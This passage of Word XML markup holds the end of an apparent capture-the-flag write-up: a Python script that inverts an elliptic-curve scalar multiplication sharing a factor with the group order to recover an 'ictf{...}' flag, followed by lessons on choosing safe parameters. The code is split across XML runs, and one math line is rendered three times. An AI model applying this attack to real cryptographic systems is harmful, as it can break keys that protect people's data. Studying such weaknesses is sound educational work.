    <w:p w14:paraId="68B18934" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        if y1%p==0: return O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE98F6A" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        lam=((3*x1*x1+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>a)*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>inv((2*y</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>))%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FDB8F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    x3=(lam*lam-x1-x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>2)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p; y3=(lam*(x1-x3)-y</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06AEC7" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    return (x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>3,y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6BDA1E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def mul(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>k,P</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B71DC" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    R=O; Q=P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746BF144" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    while k&gt;0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13B091" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        if k&amp;1: R=add(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>R,Q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69960C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        Q=add(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>Q,Q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>); k&gt;&gt;=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE2F70" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    return R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685EB6CC" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def neg(P): return (P[0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>],(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>-P[1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>])%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p) if P else O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497AB85" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def lift_x(x):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199BC704" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    rhs=(pow(x,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>3,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)+a*x+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>b)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>p; y=tonelli(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>rhs,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082E92B0" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    return (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>x,y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>) if y else None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE202F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="01E59866" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>Q=lift_x(target_x); Qc=[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>Q,neg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>(Q)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60143521" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="0247160D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t># s = r^-1 mod m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2599C8" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def egcd(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>a,b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49897C2D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if b==0: return (a,1,0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6DB81E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>g,x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>,y=egcd(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>b,a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>%b); return (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>g,y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>,x-(a//</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>b)*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3D34B6" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>g,x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>,y=egcd(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>r,m</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>); s=x%m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1BED7B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>P0=mul(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>s,Q</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372467A" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="72067209" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t># kernel generator T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C51BA8D" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>cof=n//r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666EBA04" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def kernel_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>gen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E322F7" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C12CB4" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        P=None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DCE076" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        while P is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719BFE5C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            P=lift_x(randrange(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1,p</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879F40E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        T=mul(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>cof,P</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49946E77" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        if T and mul(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>r,T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)==O: return T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E999B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>T=kernel_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>gen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E37A8FF" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="685B28BC" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t># search coset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3695EF" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>def try_flag(xi):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252298F0" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    raw=xi.to_bytes((xi.bit_length</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>()+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>7)//8,'big')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5201FC" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    for pad in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>0,32):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422EF5F" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        buf=(b"\x00"*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>pad)+</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B45ECA5" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24946DAE" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">            s=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>buf.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4069BA" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>s.startswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>ictf{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">") and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>s.endswith</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>("}"): return s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24E347" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">            if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>s.isprintable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>(): return "ictf{"+s+"}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31300B69" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">        except: pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B329536" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    return None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E92F8D4" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502"/>
    <w:p w14:paraId="6760D067" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>X=P0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0827F522" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>for j in range(r):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF3DA89" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    flag=try_flag(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>X[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913BB05" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    if flag: print(flag); break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA9565" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t xml:space="preserve">    X=add(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>X,T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4210B7" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:t>Run with plain Python 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D883231" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="26CB1F1C">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFA696E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB5C75" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1502">
        <w:t>[k][k][k] on elliptic curves is only bijective if gcd</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>⁡</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>k,</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1\gcd(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>k,|</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>|)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1gcd(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>k,</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>E</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∣</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1502">
        <w:t>)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F1502">
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206B085" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1502">
        <w:t>Using a scalar that shares a factor with the group order makes inversion possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AECB1C" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F1502">
        <w:lastRenderedPageBreak/>
        <w:t>Always ensure curve parameters are chosen so that scalars in crypto protocols are safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB2E77B" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="00000000" w:rsidP="005F1502">
      <w:r>
        <w:pict w14:anchorId="59754CC3">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367529E" w14:textId="77777777" w:rsidR="005F1502" w:rsidRPr="005F1502" w:rsidRDefault="005F1502" w:rsidP="005F1502">
      <w:r w:rsidRPr="005F1502">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
